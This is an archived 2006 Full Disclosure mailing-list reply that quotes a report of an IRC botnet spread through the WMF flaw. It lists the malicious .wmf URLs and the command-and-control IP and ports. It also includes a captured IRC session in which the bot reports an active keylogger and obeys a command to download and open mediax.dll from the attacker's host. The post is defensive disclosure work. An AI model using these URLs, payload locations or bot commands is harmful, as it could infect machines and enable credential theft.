Full Disclosure mailing list archives
Re: Possible large botnet
From: <obnoxious () hush com>
Date: Fri, 20 Jan 2006 08:57:50 -0500
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I don't necessarily think whomever was infected was infected via viewing this site: http://php.tjit.or.kr/ppp/log/sent.txt Lists a slew of email addresses which whomever "could have" sent bogus messages to possibly infect (l)users. On Fri, 20 Jan 2006 01:35:45 -0500 Pablo Esterban <pablo_esterban () hotmail com> wrote:
Seems to be a botnet forming with the help of exploiting the recent wmf flaw on the following site. AFAIK malware/adware is referencing this. ************D O N O T C L I C K************ http://213.17.233.194/mediabar.wmf http://213.17.233.194/stat_s3.php http://213.17.233.194/stat.html ************D O N O T C L I C K************ This injects a trojan connecting to 219.240.142.59 on port 44234 44234/tcp open irc Unreal ircd 47292/tcp open irc Unreal ircd 47296/tcp open irc Unreal ircd 54729/tcp open irc-proxy psyBNC 2.3.1 Channel stats list around 500 bots and around 1200 connected (may or may not be accurate), however if you poke around you will find http://219.240.142.59/usage/, containing some interesting links and info about when this most likely started. The tcp stream below demos the login, and calling of http://219.240.142.59/ppp/mediax.dll. Stats for January list close
to 90k hits on this particular file(!). NICK ***** USER plnaehe 0 0 :***** :irc.foonet.com NOTICE AUTH :*** Looking up your hostname... :irc.foonet.com NOTICE AUTH :*** Found your hostname :irc.foonet.com 001 *****:Welcome to the ROXnet IRC Network ***** :irc.foonet.com 002 *****:Your host is irc.foonet.com, running version Unreal3.2.3 :irc.foonet.com 003 *****:This server was created Thu Oct 13 2005 at 17:25:57 KST :irc.foonet.com 005 *****SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS WATCH=128 :are supported by this server :irc.foonet.com 005 *****SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=beIqa,kfL,lj,psmntirRcOAQKVGCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=@%+ EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server :irc.foonet.com 251 *****:There are 1 users and 1194 invisible on 1 servers :irc.foonet.com 252 *****1 :operator(s) online :irc.foonet.com 253 *****201 :unknown connection(s) :irc.foonet.com 254 *****10 :channels formed :irc.foonet.com 255 *****:I have 1195 clients and 0 servers :irc.foonet.com 265 *****:Current Local Users: 1195 Max: 5529 :irc.foonet.com 266 *****:Current Global Users: 1195 Max: 1276 :irc.foonet.com 422 *****:MOTD File is missing *****MODE *****:+iwTxd USERHOST ***** :irc.foonet.com 302 *****:***** MODE *****-x+B JOIN #mrbean5 rowan PRIVMSG *****:[KEYLOG]: Key logger active. USERHOST ***** MODE *****-x+B JOIN #mrbean5 rowan USERHOST ***** MODE *****-x+B JOIN #mrbean5 rowan :irc.foonet.com NOTICE *****:BOTMOTD File not found *****MODE *****:-x+B ***** JOIN :#mrbean5 :irc.foonet.com 332 *****#mrbean5 :.wipe http://219.240.142.59/ppp/mediax.dll mediax.dll 3 :irc.foonet.com 333 *****#mrbean5 DDDI 1137401387 :irc.foonet.com 353 *****@ #mrbean5 ***** :irc.foonet.com 366 *****#mrbean5 :End of /NAMES list. *****PRIVMSG *****:[KEYLOG]: Key logger active. :irc.foonet.com 302 ***** :irc.foonet.com 302 ***** PRIVMSG #mrbean5 :[DOWNLOAD]: Downloading URL: http://219.240.142.59/ppp/mediax.dll to: mediax.dll. :irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5) PRIVMSG #mrbean5 :[DOWNLOAD]: Downloaded 214.5 KB to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll @ 71.5 KB/sec. PRIVMSG #mrbean5 :[DOWNLOAD]: Opened: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll. :irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5) :irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5) _________________________________________________________________ Don't just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkYEARECAAYFAkPQ7FsACgkQo8cxM8/cskpeWgCfYV8lOqt4qAqGHbXl3/YPjsjE26oA oIe+zN0P1qsDz+gfy4da+vfZ+A3y =suSR -----END PGP SIGNATURE----- Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Possible large botnet Pablo Esterban (Jan 19)
- <Possible follow-ups>
- Re: Possible large botnet obnoxious (Jan 20)
- Re: Possible large botnet Stan Bubrouski (Jan 20)
- Re: Possible large botnet franco segna (Jan 23)
- Re: Possible large botnet Stan Bubrouski (Jan 20)